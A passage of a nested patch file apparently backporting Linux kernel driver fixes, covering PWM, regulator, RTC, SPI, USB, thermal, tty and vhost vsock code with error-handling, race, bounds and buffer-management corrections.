+ 
+-	clk_enable(p->clk);
++	clk_prepare_enable(p->clk);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/pwm/pwm-sti.c b/drivers/pwm/pwm-sti.c
+index 44b1f93256b36..652fdb8dc7bfa 100644
+--- a/drivers/pwm/pwm-sti.c
++++ b/drivers/pwm/pwm-sti.c
+@@ -79,6 +79,7 @@ struct sti_pwm_compat_data {
+ 	unsigned int cpt_num_devs;
+ 	unsigned int max_pwm_cnt;
+ 	unsigned int max_prescale;
++	struct sti_cpt_ddata *ddata;
+ };
+ 
+ struct sti_pwm_chip {
+@@ -314,7 +315,7 @@ static int sti_pwm_capture(struct pwm_chip *chip, struct pwm_device *pwm,
+ {
+ 	struct sti_pwm_chip *pc = to_sti_pwmchip(chip);
+ 	struct sti_pwm_compat_data *cdata = pc->cdata;
+-	struct sti_cpt_ddata *ddata = pwm_get_chip_data(pwm);
++	struct sti_cpt_ddata *ddata = &cdata->ddata[pwm->hwpwm];
+ 	struct device *dev = pc->dev;
+ 	unsigned int effective_ticks;
+ 	unsigned long long high, low;
+@@ -440,7 +441,7 @@ static irqreturn_t sti_pwm_interrupt(int irq, void *data)
+ 	while (cpt_int_stat) {
+ 		devicenum = ffs(cpt_int_stat) - 1;
+ 
+-		ddata = pwm_get_chip_data(&pc->chip.pwms[devicenum]);
++		ddata = &pc->cdata->ddata[devicenum];
+ 
+ 		/*
+ 		 * Capture input:
+@@ -638,30 +639,28 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ 			dev_err(dev, "failed to prepare clock\n");
+ 			return ret;
+ 		}
++
++		cdata->ddata = devm_kzalloc(dev, cdata->cpt_num_devs * sizeof(*cdata->ddata), GFP_KERNEL);
++		if (!cdata->ddata)
++			return -ENOMEM;
+ 	}
+ 
+ 	pc->chip.dev = dev;
+ 	pc->chip.ops = &sti_pwm_ops;
+ 	pc->chip.npwm = pc->cdata->pwm_num_devs;
+ 
+-	ret = pwmchip_add(&pc->chip);
+-	if (ret < 0) {
+-		clk_unprepare(pc->pwm_clk);
+-		clk_unprepare(pc->cpt_clk);
+-		return ret;
+-	}
+-
+ 	for (i = 0; i < cdata->cpt_num_devs; i++) {
+-		struct sti_cpt_ddata *ddata;
+-
+-		ddata = devm_kzalloc(dev, sizeof(*ddata), GFP_KERNEL);
+-		if (!ddata)
+-			return -ENOMEM;
++		struct sti_cpt_ddata *ddata = &cdata->ddata[i];
+ 
+ 		init_waitqueue_head(&ddata->wait);
+ 		mutex_init(&ddata->lock);
++	}
+ 
+-		pwm_set_chip_data(&pc->chip.pwms[i], ddata);
++	ret = pwmchip_add(&pc->chip);
++	if (ret < 0) {
++		clk_unprepare(pc->pwm_clk);
++		clk_unprepare(pc->cpt_clk);
++		return ret;
+ 	}
+ 
+ 	platform_set_drvdata(pdev, pc);
+diff --git a/drivers/regulator/mt6358-regulator.c b/drivers/regulator/mt6358-regulator.c
+index a0441b8086712..de7b5db8f7f2d 100644
+--- a/drivers/regulator/mt6358-regulator.c
++++ b/drivers/regulator/mt6358-regulator.c
+@@ -655,12 +655,18 @@ static int mt6358_regulator_probe(struct platform_device *pdev)
+ 	struct mt6358_regulator_info *mt6358_info;
+ 	int i, max_regulator;
+ 
+-	if (mt6397->chip_id == MT6366_CHIP_ID) {
+-		max_regulator = MT6366_MAX_REGULATOR;
+-		mt6358_info = mt6366_regulators;
+-	} else {
++	switch (mt6397->chip_id) {
++	case MT6358_CHIP_ID:
+ 		max_regulator = MT6358_MAX_REGULATOR;
+ 		mt6358_info = mt6358_regulators;
++		break;
++	case MT6366_CHIP_ID:
++		max_regulator = MT6366_MAX_REGULATOR;
++		mt6358_info = mt6366_regulators;
++		break;
++	default:
++		dev_err(&pdev->dev, "unsupported chip ID: %d\n", mt6397->chip_id);
++		return -EINVAL;
+ 	}
+ 
+ 	for (i = 0; i < max_regulator; i++) {
+diff --git a/drivers/rtc/rtc-pcf85363.c b/drivers/rtc/rtc-pcf85363.c
+index c05b722f00605..0d1517cb3c62d 100644
+--- a/drivers/rtc/rtc-pcf85363.c
++++ b/drivers/rtc/rtc-pcf85363.c
+@@ -402,7 +402,7 @@ static int pcf85363_probe(struct i2c_client *client)
+ 	if (client->irq > 0) {
+ 		regmap_write(pcf85363->regmap, CTRL_FLAGS, 0);
+ 		regmap_update_bits(pcf85363->regmap, CTRL_PIN_IO,
+-				   PIN_IO_INTA_OUT, PIN_IO_INTAPM);
++				   PIN_IO_INTAPM, PIN_IO_INTA_OUT);
+ 		ret = devm_request_threaded_irq(&client->dev, client->irq,
+ 						NULL, pcf85363_rtc_handle_irq,
+ 						IRQF_TRIGGER_LOW | IRQF_ONESHOT,
+diff --git a/drivers/scsi/ibmvscsi/ibmvfc.c b/drivers/scsi/ibmvscsi/ibmvfc.c
+index 1a0c0b7289d26..41148b0430df9 100644
+--- a/drivers/scsi/ibmvscsi/ibmvfc.c
++++ b/drivers/scsi/ibmvscsi/ibmvfc.c
+@@ -22,7 +22,6 @@
+ #include <linux/bsg-lib.h>
+ #include <asm/firmware.h>
+ #include <asm/irq.h>
+-#include <asm/rtas.h>
+ #include <asm/vio.h>
+ #include <scsi/scsi.h>
+ #include <scsi/scsi_cmnd.h>
+@@ -5804,7 +5803,7 @@ static int ibmvfc_register_scsi_channel(struct ibmvfc_host *vhost,
+ irq_failed:
+ 	do {
+ 		rc = plpar_hcall_norets(H_FREE_SUB_CRQ, vdev->unit_address, scrq->cookie);
+-	} while (rtas_busy_delay(rc));
++	} while (rc == H_BUSY || H_IS_LONG_BUSY(rc));
+ reg_failed:
+ 	LEAVE;
+ 	return rc;
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 85219b5e1f416..bc400669ee022 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -778,6 +778,9 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 	u32 version;
+ 	struct regmap *regmap;
+ 
++	if (!IS_ERR(drv_data))
++		return -EBUSY;
++
+ 	drv_data = devm_kzalloc(dev, sizeof(*drv_data), GFP_KERNEL);
+ 	if (!drv_data) {
+ 		ret = -ENOMEM;
+diff --git a/drivers/spi/Kconfig b/drivers/spi/Kconfig
+index d4b969e68c314..946e2186d2448 100644
+--- a/drivers/spi/Kconfig
++++ b/drivers/spi/Kconfig
+@@ -1093,6 +1093,7 @@ config SPI_XTENSA_XTFPGA
+ config SPI_ZYNQ_QSPI
+ 	tristate "Xilinx Zynq QSPI controller"
+ 	depends on ARCH_ZYNQ || COMPILE_TEST
++	depends on SPI_MEM
+ 	help
+ 	  This enables support for the Zynq Quad SPI controller
+ 	  in master mode.
+diff --git a/drivers/spi/spi-nxp-fspi.c b/drivers/spi/spi-nxp-fspi.c
+index c7a4a3606547e..afecf69d3ceba 100644
+--- a/drivers/spi/spi-nxp-fspi.c
++++ b/drivers/spi/spi-nxp-fspi.c
+@@ -708,7 +708,7 @@ static int nxp_fspi_read_ahb(struct nxp_fspi *f, const struct spi_mem_op *op)
+ 		f->memmap_len = len > NXP_FSPI_MIN_IOMAP ?
+ 				len : NXP_FSPI_MIN_IOMAP;
+ 
+-		f->ahb_addr = ioremap_wc(f->memmap_phy + f->memmap_start,
++		f->ahb_addr = ioremap(f->memmap_phy + f->memmap_start,
+ 					 f->memmap_len);
+ 
+ 		if (!f->ahb_addr) {
+diff --git a/drivers/spi/spi-tegra20-slink.c b/drivers/spi/spi-tegra20-slink.c
+index 148043d0c2b84..24cab56ecb7fd 100644
+--- a/drivers/spi/spi-tegra20-slink.c
++++ b/drivers/spi/spi-tegra20-slink.c
+@@ -1093,6 +1093,8 @@ static int tegra_slink_probe(struct platform_device *pdev)
+ 	reset_control_deassert(tspi->rst);
+ 
+ 	spi_irq = platform_get_irq(pdev, 0);
++	if (spi_irq < 0)
++		return spi_irq;
+ 	tspi->irq = spi_irq;
+ 	ret = request_threaded_irq(tspi->irq, tegra_slink_isr,
+ 				   tegra_slink_isr_thread, IRQF_ONESHOT,
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus_hw.c b/drivers/staging/media/sunxi/cedrus/cedrus_hw.c
+index a6470a89851e3..fe5fbf6cf6314 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus_hw.c
++++ b/drivers/staging/media/sunxi/cedrus/cedrus_hw.c
+@@ -172,12 +172,12 @@ int cedrus_hw_suspend(struct device *device)
+ {
+ 	struct cedrus_dev *dev = dev_get_drvdata(device);
+ 
+-	reset_control_assert(dev->rstc);
+-
+ 	clk_disable_unprepare(dev->ram_clk);
+ 	clk_disable_unprepare(dev->mod_clk);
+ 	clk_disable_unprepare(dev->ahb_clk);
+ 
++	reset_control_assert(dev->rstc);
++
+ 	return 0;
+ }
+ 
+@@ -186,11 +186,18 @@ int cedrus_hw_resume(struct device *device)
+ 	struct cedrus_dev *dev = dev_get_drvdata(device);
+ 	int ret;
+ 
++	ret = reset_control_reset(dev->rstc);
++	if (ret) {
++		dev_err(dev->dev, "Failed to apply reset\n");
++
++		return ret;
++	}
++
+ 	ret = clk_prepare_enable(dev->ahb_clk);
+ 	if (ret) {
+ 		dev_err(dev->dev, "Failed to enable AHB clock\n");
+ 
+-		return ret;
++		goto err_rst;
+ 	}
+ 
+ 	ret = clk_prepare_enable(dev->mod_clk);
+@@ -207,21 +214,14 @@ int cedrus_hw_resume(struct device *device)
+ 		goto err_mod_clk;
+ 	}
+ 
+-	ret = reset_control_reset(dev->rstc);
+-	if (ret) {
+-		dev_err(dev->dev, "Failed to apply reset\n");
+-
+-		goto err_ram_clk;
+-	}
+-
+ 	return 0;
+ 
+-err_ram_clk:
+-	clk_disable_unprepare(dev->ram_clk);
+ err_mod_clk:
+ 	clk_disable_unprepare(dev->mod_clk);
+ err_ahb_clk:
+ 	clk_disable_unprepare(dev->ahb_clk);
++err_rst:
++	reset_control_assert(dev->rstc);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/thermal/thermal_core.c b/drivers/thermal/thermal_core.c
+index 1eae4ec719a8f..ebb36b2c72d5d 100644
+--- a/drivers/thermal/thermal_core.c
++++ b/drivers/thermal/thermal_core.c
+@@ -649,7 +649,8 @@ int thermal_zone_bind_cooling_device(struct thermal_zone_device *tz,
+ 	if (result)
+ 		goto release_ida;
+ 
+-	sprintf(dev->attr_name, "cdev%d_trip_point", dev->id);
++	snprintf(dev->attr_name, sizeof(dev->attr_name), "cdev%d_trip_point",
++		 dev->id);
+ 	sysfs_attr_init(&dev->attr.attr);
+ 	dev->attr.attr.name = dev->attr_name;
+ 	dev->attr.attr.mode = 0444;
+@@ -658,7 +659,8 @@ int thermal_zone_bind_cooling_device(struct thermal_zone_device *tz,
+ 	if (result)
+ 		goto remove_symbol_link;
+ 
+-	sprintf(dev->weight_attr_name, "cdev%d_weight", dev->id);
++	snprintf(dev->weight_attr_name, sizeof(dev->weight_attr_name),
++		 "cdev%d_weight", dev->id);
+ 	sysfs_attr_init(&dev->weight_attr.attr);
+ 	dev->weight_attr.attr.name = dev->weight_attr_name;
+ 	dev->weight_attr.attr.mode = S_IWUSR | S_IRUGO;
+diff --git a/drivers/tty/tty_jobctrl.c b/drivers/tty/tty_jobctrl.c
+index 0d04287da0984..ef8741c3e6629 100644
+--- a/drivers/tty/tty_jobctrl.c
++++ b/drivers/tty/tty_jobctrl.c
+@@ -300,12 +300,7 @@ void disassociate_ctty(int on_exit)
+ 		return;
+ 	}
+ 
+-	spin_lock_irq(&current->sighand->siglock);
+-	put_pid(current->signal->tty_old_pgrp);
+-	current->signal->tty_old_pgrp = NULL;
+-	tty = tty_kref_get(current->signal->tty);
+-	spin_unlock_irq(&current->sighand->siglock);
+-
++	tty = get_current_tty();
+ 	if (tty) {
+ 		unsigned long flags;
+ 
+@@ -320,6 +315,16 @@ void disassociate_ctty(int on_exit)
+ 		tty_kref_put(tty);
+ 	}
+ 
++	/* If tty->ctrl.pgrp is not NULL, it may be assigned to
++	 * current->signal->tty_old_pgrp in a race condition and
++	 * cause a pid memleak. Release current->signal->tty_old_pgrp
++	 * only after tty->ctrl.pgrp is set to NULL.
++	 */
++	spin_lock_irq(&current->sighand->siglock);
++	put_pid(current->signal->tty_old_pgrp);
++	current->signal->tty_old_pgrp = NULL;
++	spin_unlock_irq(&current->sighand->siglock);
++
+ 	/* Now clear signal->tty under the lock */
+ 	read_lock(&tasklist_lock);
+ 	session_clear_tty(task_session(current));
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 6ba4ef2c3949e..dc38d1fa77874 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -3579,7 +3579,7 @@ int ufshcd_read_string_desc(struct ufs_hba *hba, u8 desc_index,
+ 		 */
+ 		ret = utf16s_to_utf8s(uc_str->uc,
+ 				      uc_str->len - QUERY_DESC_HDR_SIZE,
+-				      UTF16_BIG_ENDIAN, str, ascii_len);
++				      UTF16_BIG_ENDIAN, str, ascii_len - 1);
+ 
+ 		/* replace non-printable or non-ASCII characters with spaces */
+ 		for (i = 0; i < ret; i++)
+diff --git a/drivers/usb/chipidea/host.c b/drivers/usb/chipidea/host.c
+index 3b08c5e811707..34bbdfadd66f3 100644
+--- a/drivers/usb/chipidea/host.c
++++ b/drivers/usb/chipidea/host.c
+@@ -30,8 +30,7 @@ struct ehci_ci_priv {
+ };
+ 
+ struct ci_hdrc_dma_aligned_buffer {
+-	void *kmalloc_ptr;
+-	void *old_xfer_buffer;
++	void *original_buffer;
+ 	u8 data[];
+ };
+ 
+@@ -380,59 +379,52 @@ static int ci_ehci_bus_suspend(struct usb_hcd *hcd)
+ 	return 0;
+ }
+ 
+-static void ci_hdrc_free_dma_aligned_buffer(struct urb *urb)
++static void ci_hdrc_free_dma_aligned_buffer(struct urb *urb, bool copy_back)
+ {
+ 	struct ci_hdrc_dma_aligned_buffer *temp;
+-	size_t length;
+ 
+ 	if (!(urb->transfer_flags & URB_ALIGNED_TEMP_BUFFER))
+ 		return;
++	urb->transfer_flags &= ~URB_ALIGNED_TEMP_BUFFER;
+ 
+ 	temp = container_of(urb->transfer_buffer,
+ 			    struct ci_hdrc_dma_aligned_buffer, data);
++	urb->transfer_buffer = temp->original_buffer;
++
++	if (copy_back && usb_urb_dir_in(urb)) {
++		size_t length;
+ 
+-	if (usb_urb_dir_in(urb)) {
+ 		if (usb_pipeisoc(urb->pipe))
+ 			length = urb->transfer_buffer_length;
+ 		else
+ 			length = urb->actual_length;
+ 
+-		memcpy(temp->old_xfer_buffer, temp->data, length);
++		memcpy(temp->original_buffer, temp->data, length);
+ 	}
+-	urb->transfer_buffer = temp->old_xfer_buffer;
+-	kfree(temp->kmalloc_ptr);
+ 
+-	urb->transfer_flags &= ~URB_ALIGNED_TEMP_BUFFER;
++	kfree(temp);
+ }
+ 
+ static int ci_hdrc_alloc_dma_aligned_buffer(struct urb *urb, gfp_t mem_flags)
+ {
+-	struct ci_hdrc_dma_aligned_buffer *temp, *kmalloc_ptr;
+-	const unsigned int ci_hdrc_usb_dma_align = 32;
+-	size_t kmalloc_size;
++	struct ci_hdrc_dma_aligned_buffer *temp;
+ 
+-	if (urb->num_sgs || urb->sg || urb->transfer_buffer_length == 0 ||
+-	    !((uintptr_t)urb->transfer_buffer & (ci_hdrc_usb_dma_align - 1)))
++	if (urb->num_sgs || urb->sg || urb->transfer_buffer_length == 0)
++		return 0;
++	if (IS_ALIGNED((uintptr_t)urb->transfer_buffer, 4)
++	    && IS_ALIGNED(urb->transfer_buffer_length, 4))
+ 		return 0;
+ 
+-	/* Allocate a buffer with enough padding for alignment */
+-	kmalloc_size = urb->transfer_buffer_length +
+-		       sizeof(struct ci_hdrc_dma_aligned_buffer) +
+-		       ci_hdrc_usb_dma_align - 1;
+-
+-	kmalloc_ptr = kmalloc(kmalloc_size, mem_flags);
+-	if (!kmalloc_ptr)
++	temp = kmalloc(sizeof(*temp) + ALIGN(urb->transfer_buffer_length, 4), mem_flags);
++	if (!temp)
+ 		return -ENOMEM;
+ 
+-	/* Position our struct dma_aligned_buffer such that data is aligned */
+-	temp = PTR_ALIGN(kmalloc_ptr + 1, ci_hdrc_usb_dma_align) - 1;
+-	temp->kmalloc_ptr = kmalloc_ptr;
+-	temp->old_xfer_buffer = urb->transfer_buffer;
+ 	if (usb_urb_dir_out(urb))
+ 		memcpy(temp->data, urb->transfer_buffer,
+ 		       urb->transfer_buffer_length);
+-	urb->transfer_buffer = temp->data;
+ 
++	temp->original_buffer = urb->transfer_buffer;
++	urb->transfer_buffer = temp->data;
+ 	urb->transfer_flags |= URB_ALIGNED_TEMP_BUFFER;
+ 
+ 	return 0;
+@@ -449,7 +441,7 @@ static int ci_hdrc_map_urb_for_dma(struct usb_hcd *hcd, struct urb *urb,
+ 
+ 	ret = usb_hcd_map_urb_for_dma(hcd, urb, mem_flags);
+ 	if (ret)
+-		ci_hdrc_free_dma_aligned_buffer(urb);
++		ci_hdrc_free_dma_aligned_buffer(urb, false);
+ 
+ 	return ret;
+ }
+@@ -457,7 +449,7 @@ static int ci_hdrc_map_urb_for_dma(struct usb_hcd *hcd, struct urb *urb,
+ static void ci_hdrc_unmap_urb_for_dma(struct usb_hcd *hcd, struct urb *urb)
+ {
+ 	usb_hcd_unmap_urb_for_dma(hcd, urb);
+-	ci_hdrc_free_dma_aligned_buffer(urb);
++	ci_hdrc_free_dma_aligned_buffer(urb, true);
+ }
+ 
+ int ci_hdrc_host_init(struct ci_hdrc *ci)
+diff --git a/drivers/usb/dwc2/hcd.c b/drivers/usb/dwc2/hcd.c
+index 657f1f659ffaf..35c7a4df8e717 100644
+--- a/drivers/usb/dwc2/hcd.c
++++ b/drivers/usb/dwc2/hcd.c
+@@ -4769,8 +4769,8 @@ fail3:
+ 	if (qh_allocated && qh->channel && qh->channel->qh == qh)
+ 		qh->channel->qh = NULL;
+ fail2:
+-	spin_unlock_irqrestore(&hsotg->lock, flags);
+ 	urb->hcpriv = NULL;
++	spin_unlock_irqrestore(&hsotg->lock, flags);
+ 	kfree(qtd);
+ fail1:
+ 	if (qh_allocated) {
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 2aed88c28ef69..c4dd648710ae0 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -348,6 +348,8 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 	/* xHC spec requires PCI devices to support D3hot and D3cold */
+ 	if (xhci->hci_version >= 0x120)
+ 		xhci->quirks |= XHCI_DEFAULT_PM_RUNTIME_ALLOW;
++	else if (pdev->vendor == PCI_VENDOR_ID_AMD && xhci->hci_version >= 0x110)
++		xhci->quirks |= XHCI_DEFAULT_PM_RUNTIME_ALLOW;
+ 
+ 	if (xhci->quirks & XHCI_RESET_ON_RESUME)
+ 		xhci_dbg_trace(xhci, trace_xhci_dbg_quirks,
+diff --git a/drivers/usb/host/xhci-plat.c b/drivers/usb/host/xhci-plat.c
+index 5fb55bf194931..c9a101f0e8d01 100644
+--- a/drivers/usb/host/xhci-plat.c
++++ b/drivers/usb/host/xhci-plat.c
+@@ -456,23 +456,38 @@ static int __maybe_unused xhci_plat_resume(struct device *dev)
+ 	int ret;
+ 
+ 	if (!device_may_wakeup(dev) && (xhci->quirks & XHCI_SUSPEND_RESUME_CLKS)) {
+-		clk_prepare_enable(xhci->clk);
+-		clk_prepare_enable(xhci->reg_clk);
++		ret = clk_prepare_enable(xhci->clk);
++		if (ret)
++			return ret;
++
++		ret = clk_prepare_enable(xhci->reg_clk);
++		if (ret) {
++			clk_disable_unprepare(xhci->clk);
++			return ret;
++		}
+ 	}
+ 
+ 	ret = xhci_priv_resume_quirk(hcd);
+ 	if (ret)
+-		return ret;
++		goto disable_clks;
+ 
+ 	ret = xhci_resume(xhci, 0);
+ 	if (ret)
+-		return ret;
++		goto disable_clks;
+ 
+ 	pm_runtime_disable(dev);
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
+ 	return 0;
++
++disable_clks:
++	if (!device_may_wakeup(dev) && (xhci->quirks & XHCI_SUSPEND_RESUME_CLKS)) {
++		clk_disable_unprepare(xhci->clk);
++		clk_disable_unprepare(xhci->reg_clk);
++	}
++
++	return ret;
+ }
+ 
+ static int __maybe_unused xhci_plat_runtime_suspend(struct device *dev)
+diff --git a/drivers/usb/usbip/stub_dev.c b/drivers/usb/usbip/stub_dev.c
+index 3c6d452e3bf40..4104eea03e806 100644
+--- a/drivers/usb/usbip/stub_dev.c
++++ b/drivers/usb/usbip/stub_dev.c
+@@ -462,8 +462,13 @@ static void stub_disconnect(struct usb_device *udev)
+ 	/* release port */
+ 	rc = usb_hub_release_port(udev->parent, udev->portnum,
+ 				  (struct usb_dev_state *) udev);
+-	if (rc) {
+-		dev_dbg(&udev->dev, "unable to release port\n");
++	/*
++	 * NOTE: If a hub disconnect triggered the disconnect of the downstream
++	 * device, usb_hub_release_port() will return -ENODEV, so we can safely
++	 * ignore that error here.
++	 */
++	if (rc && (rc != -ENODEV)) {
++		dev_dbg(&udev->dev, "unable to release port (%i)\n", rc);
+ 		return;
+ 	}
+ 
+diff --git a/drivers/vhost/vsock.c b/drivers/vhost/vsock.c
+index a2b3743723639..1f3b89c885cca 100644
+--- a/drivers/vhost/vsock.c
++++ b/drivers/vhost/vsock.c
+@@ -51,8 +51,7 @@ struct vhost_vsock {
+ 	struct hlist_node hash;
+ 
+ 	struct vhost_work send_pkt_work;
+-	spinlock_t send_pkt_list_lock;
+-	struct list_head send_pkt_list;	/* host->guest pending packets */
++	struct sk_buff_head send_pkt_queue; /* host->guest pending packets */
+ 
+ 	atomic_t queued_replies;
+ 
+@@ -108,40 +107,31 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 	vhost_disable_notify(&vsock->dev, vq);
+ 
+ 	do {
+-		struct virtio_vsock_pkt *pkt;
++		struct virtio_vsock_hdr *hdr;
++		size_t iov_len, payload_len;
+ 		struct iov_iter iov_iter;
++		u32 flags_to_restore = 0;
++		struct sk_buff *skb;
+ 		unsigned out, in;
+ 		size_t nbytes;
+-		size_t iov_len, payload_len;
+ 		int head;
+-		u32 flags_to_restore = 0;
+ 
+-		spin_lock_bh(&vsock->send_pkt_list_lock);
+-		if (list_empty(&vsock->send_pkt_list)) {
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
++		skb = virtio_vsock_skb_dequeue(&vsock->send_pkt_queue);
++
++		if (!skb) {
+ 			vhost_enable_notify(&vsock->dev, vq);
+ 			break;
+ 		}
+ 
+-		pkt = list_first_entry(&vsock->send_pkt_list,
+-				       struct virtio_vsock_pkt, list);
+-		list_del_init(&pkt->list);
+-		spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
+ 		head = vhost_get_vq_desc(vq, vq->iov, ARRAY_SIZE(vq->iov),
+ 					 &out, &in, NULL, NULL);
+ 		if (head < 0) {
+-			spin_lock_bh(&vsock->send_pkt_list_lock);
+-			list_add(&pkt->list, &vsock->send_pkt_list);
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
++			virtio_vsock_skb_queue_head(&vsock->send_pkt_queue, skb);
+ 			break;
+ 		}
+ 
+ 		if (head == vq->num) {
+-			spin_lock_bh(&vsock->send_pkt_list_lock);
+-			list_add(&pkt->list, &vsock->send_pkt_list);
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
+-
++			virtio_vsock_skb_queue_head(&vsock->send_pkt_queue, skb);
+ 			/* We cannot finish yet if more buffers snuck in while
+ 			 * re-enabling notify.
+ 			 */
+@@ -153,26 +143,27 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 		}
+ 
+ 		if (out) {
+-			virtio_transport_free_pkt(pkt);
++			kfree_skb(skb);
+ 			vq_err(vq, "Expected 0 output buffers, got %u\n", out);
+ 			break;
+ 		}
+ 
+ 		iov_len = iov_length(&vq->iov[out], in);
+-		if (iov_len < sizeof(pkt->hdr)) {
+-			virtio_transport_free_pkt(pkt);
++		if (iov_len < sizeof(*hdr)) {
++			kfree_skb(skb);
+ 			vq_err(vq, "Buffer len [%zu] too small\n", iov_len);
+ 			break;
+ 		}
+ 
+ 		iov_iter_init(&iov_iter, ITER_DEST, &vq->iov[out], in, iov_len);
+-		payload_len = pkt->len - pkt->off;
++		payload_len = skb->len;
++		hdr = virtio_vsock_hdr(skb);
+ 
+ 		/* If the packet is greater than the space available in the
+ 		 * buffer, we split it using multiple buffers.
+ 		 */
+-		if (payload_len > iov_len - sizeof(pkt->hdr)) {
+-			payload_len = iov_len - sizeof(pkt->hdr);
++		if (payload_len > iov_len - sizeof(*hdr)) {
++			payload_len = iov_len - sizeof(*hdr);
+ 
+ 			/* As we are copying pieces of large packet's buffer to
+ 			 * small rx buffers, headers of packets in rx queue are
+@@ -185,31 +176,30 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 			 * bits set. After initialized header will be copied to
+ 			 * rx buffer, these required bits will be restored.
+ 			 */
+-			if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOM) {
+-				pkt->hdr.flags &= ~cpu_to_le32(VIRTIO_VSOCK_SEQ_EOM);
++			if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SEQ_EOM) {
++				hdr->flags &= ~cpu_to_le32(VIRTIO_VSOCK_SEQ_EOM);
+ 				flags_to_restore |= VIRTIO_VSOCK_SEQ_EOM;
+ 
+-				if (le32_to_cpu(pkt->hdr.flags) & VIRTIO_VSOCK_SEQ_EOR) {
+-					pkt->hdr.flags &= ~cpu_to_le32(VIRTIO_VSOCK_SEQ_EOR);
++				if (le32_to_cpu(hdr->flags) & VIRTIO_VSOCK_SEQ_EOR) {
++					hdr->flags &= ~cpu_to_le32(VIRTIO_VSOCK_SEQ_EOR);
+ 					flags_to_restore |= VIRTIO_VSOCK_SEQ_EOR;
+ 				}
+ 			}
+ 		}
+ 
+ 		/* Set the correct length in the header */
+-		pkt->hdr.len = cpu_to_le32(payload_len);
++		hdr->len = cpu_to_le32(payload_len);
+ 
+-		nbytes = copy_to_iter(&pkt->hdr, sizeof(pkt->hdr), &iov_iter);
+-		if (nbytes != sizeof(pkt->hdr)) {
+-			virtio_transport_free_pkt(pkt);
++		nbytes = copy_to_iter(hdr, sizeof(*hdr), &iov_iter);
++		if (nbytes != sizeof(*hdr)) {
++			kfree_skb(skb);
+ 			vq_err(vq, "Faulted on copying pkt hdr\n");
+ 			break;
+ 		}
+ 
+-		nbytes = copy_to_iter(pkt->buf + pkt->off, payload_len,
+-				      &iov_iter);
++		nbytes = copy_to_iter(skb->data, payload_len, &iov_iter);
+ 		if (nbytes != payload_len) {
+-			virtio_transport_free_pkt(pkt);
++			kfree_skb(skb);
+ 			vq_err(vq, "Faulted on copying pkt buf\n");
+ 			break;
+ 		}
+@@ -217,31 +207,28 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 		/* Deliver to monitoring devices all packets that we
+ 		 * will transmit.
+ 		 */
+-		virtio_transport_deliver_tap_pkt(pkt);
++		virtio_transport_deliver_tap_pkt(skb);
+ 
+-		vhost_add_used(vq, head, sizeof(pkt->hdr) + payload_len);
++		vhost_add_used(vq, head, sizeof(*hdr) + payload_len);
+ 		added = true;
+ 
+-		pkt->off += payload_len;
++		skb_pull(skb, payload_len);
+ 		total_len += payload_len;
+ 
+ 		/* If we didn't send all the payload we can requeue the packet
+ 		 * to send it with the next available buffer.
+ 		 */
+-		if (pkt->off < pkt->len) {
+-			pkt->hdr.flags |= cpu_to_le32(flags_to_restore);
++		if (skb->len > 0) {
++			hdr->flags |= cpu_to_le32(flags_to_restore);
+ 
+-			/* We are queueing the same virtio_vsock_pkt to handle
++			/* We are queueing the same skb to handle
+ 			 * the remaining bytes, and we want to deliver it
+ 			 * to monitoring devices in the next iteration.
+ 			 */
+-			pkt->tap_delivered = false;
+-
+-			spin_lock_bh(&vsock->send_pkt_list_lock);
+-			list_add(&pkt->list, &vsock->send_pkt_list);
+-			spin_unlock_bh(&vsock->send_pkt_list_lock);
++			virtio_vsock_skb_clear_tap_delivered(skb);
++			virtio_vsock_skb_queue_head(&vsock->send_pkt_queue, skb);
+ 		} else {
+-			if (pkt->reply) {
++			if (virtio_vsock_skb_reply(skb)) {
+ 				int val;
+ 
+ 				val = atomic_dec_return(&vsock->queued_replies);
+@@ -253,7 +240,7 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 					restart_tx = true;
+ 			}
+ 
+-			virtio_transport_free_pkt(pkt);
++			consume_skb(skb);
+ 		}
+ 	} while(likely(!vhost_exceeds_weight(vq, ++pkts, total_len)));
+ 	if (added)
+@@ -278,28 +265,26 @@ static void vhost_transport_send_pkt_work(struct vhost_work *work)
+ }
+ 
+ static int
+-vhost_transport_send_pkt(struct virtio_vsock_pkt *pkt)
++vhost_transport_send_pkt(struct sk_buff *skb)
+ {
++	struct virtio_vsock_hdr *hdr = virtio_vsock_hdr(skb);
+ 	struct vhost_vsock *vsock;
+-	int len = pkt->len;
++	int len = skb->len;
+ 
+ 	rcu_read_lock();
+ 
+ 	/* Find the vhost_vsock according to guest context id  */
+-	vsock = vhost_vsock_get(le64_to_cpu(pkt->hdr.dst_cid));
++	vsock = vhost_vsock_get(le64_to_cpu(hdr->dst_cid));
+ 	if (!vsock) {
+ 		rcu_read_unlock();
+-		virtio_transport_free_pkt(pkt);
++		kfree_skb(skb);
+ 		return -ENODEV;
+ 	}
+ 
+-	if (pkt->reply)
++	if (virtio_vsock_skb_reply(skb))
+ 		atomic_inc(&vsock->queued_replies);
+ 
